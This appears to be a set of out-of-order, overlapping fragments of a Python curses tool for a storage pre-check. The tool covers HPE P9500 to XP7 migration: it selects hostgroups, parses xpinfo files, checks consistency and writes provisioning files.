"re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items = copy.copy(self.items.keys())",
"in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try:",
"text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line",
"does not exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start =",
"for index,item in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start",
"> 0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end",
"site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level =",
"file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in",
"#################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check",
"= [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items",
"panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n",
"== curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class",
"min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position",
"= cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions =",
"[x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to",
"result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{}",
"+= n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1",
"self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show()",
"in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does",
"defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file)",
"if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ###",
"Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict =",
"select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read",
"consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or",
"copy from ConfigParser import ConfigParser import sys import os import os.path import csv",
"stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win",
"= 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\")",
"logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict:",
"int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()]",
"generate temporary horcm file and daemon to pairdisplay & check on status ####################################################################################################",
"= {} site_dict = {} collectfile_dict = {} box_dict = {} #################################################################################################### ###",
"check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION",
"= Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary =",
"0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1",
"enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500",
"= {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP:",
"len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear()",
"self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show()",
"fill the list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get():",
"= {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected",
"consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear()",
"cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value",
"=[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel =",
"self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width =",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out",
"[] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear))",
"line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent =",
"main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu",
"= self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0",
"slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in",
"{} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process",
"created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main)",
"in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\")",
"### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup",
"heigth and width ### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window",
"term criteria 1.3 Add config file 2.0 Consistency check update 2.1 Add xpinfo",
"0: if self.position - self.slice_start < 2 and self.slice_start >= 1: ### slide",
"1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while",
"for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr =",
"boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in",
"stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg =",
"class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title",
"{} instance_dict = {} site_dict = {} collectfile_dict = {} box_dict = {}",
"= set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by",
"in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate()",
"= \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch()",
"= \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1]",
"= \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only add lines",
"(Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs",
"self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line =",
"site_dict[box_name] else: err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg",
">= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set =",
"2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end",
"< 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide",
"{}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in ldev_dict: box_name =",
"+ self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n >",
"Initial version 1.1 Curses menu structure added 1.2 Add search term criteria 1.3",
"curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items",
"xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate",
"self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on",
"= {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def",
"list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for",
"title self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x",
"line too short to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup",
"self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end ))",
"skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in ldev_dict: box_name",
"__init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len",
"= line[:self.width-1] ### only add lines in the slice ### if self.slice_start <=",
"\"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name]",
"present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if",
"break elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key",
"items is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ###",
"consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write",
"### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add",
"slide slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items) - 1:",
"class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel =",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def",
"panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if n < 0:",
"### translate ldev to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr]",
"line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self):",
"select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for",
"PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) #",
"### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view",
"self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window",
"self.slice_start + self.slice_len elif n > 0: if self.slice_end - self.position < 2",
"x in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh()",
"100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\")",
"ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as",
"serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in",
"f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth -",
"self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position:",
"len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key",
"\"\"\" update the selection items list to match the new search criteria \"\"\"",
"- 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
"{} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr):",
"{}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice",
"def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr):",
"= len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show()",
"for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name]",
"sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION",
"hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by",
"### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear",
"panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ###",
"SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED",
"__init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ###",
"set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ###",
"- 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict =",
"#################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {}",
"the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch()",
"logging.handlers import copy from ConfigParser import ConfigParser import sys import os import os.path",
"log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size",
"check on status #################################################################################################### \"\"\" import curses from curses import panel import re",
"len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down",
"= self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear() line =",
"formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\")",
"collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES",
"### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as",
"= selection def update(self): \"\"\" update the list of xpinfo files present \"\"\"",
"xpinfo_dir self.selection = selection def update(self): \"\"\" update the list of xpinfo files",
"import sys import os import os.path import csv import string import xp7 ####################################################################################################",
"def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str =",
"self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0: if self.slice_start",
"down ### self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end =",
"up ### self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end",
"structure added 1.2 Add search term criteria 1.3 Add config file 2.0 Consistency",
"in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search = search def",
"class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title",
"self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list) -",
"Based on previous ODR framework 1.0 Initial version 1.1 Curses menu structure added",
"search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def",
"sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)]",
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self):",
"else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line =",
"+ \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg =",
"Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a",
"line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"status #################################################################################################### \"\"\" import curses from curses import panel import re import logging",
"processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif",
"? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the",
"= int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr",
"self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent",
"consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top()",
"for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups",
"self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if n <",
"for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to",
"line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we",
"self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key",
"file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu",
"index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif",
"- 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust",
"= list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class",
"menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\" * linelen)",
"with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row)",
"consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win",
"if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get()))",
"self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display()",
"self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection self.search = search def update(self):",
"only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr",
"sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1)",
"select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu",
"0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n > 0:",
"map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write",
"< 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ###",
"HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0)",
"+ \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name))",
"### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ###",
"xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict =",
"panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"if self.position == len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} #",
"- 1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end =",
"items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys()",
"### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict:",
"self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for index,item",
"2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO :",
"sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list",
"= self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear()",
"cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value",
"hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup",
"2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end",
">= self.width: line = line[:self.width-1] ### only add lines in the slice ###",
"exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"):",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n <",
"to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ###",
"= \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh()",
"def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def",
"= 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir =",
"self.slice_end < len(self.filtered_items) - 1: ### slide slice down ### self.slice_end += n",
"= box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0]",
"hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency",
"list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line)",
"and self.slice_start >= 1: ### slide slice up ### self.slice_start += n if",
"sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1)",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN",
"n < 0: if self.position - self.slice_start < 2 and self.slice_start >= 1:",
"self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line = \"{}:",
"= list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class",
"else: err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg +",
"in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name",
"file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file",
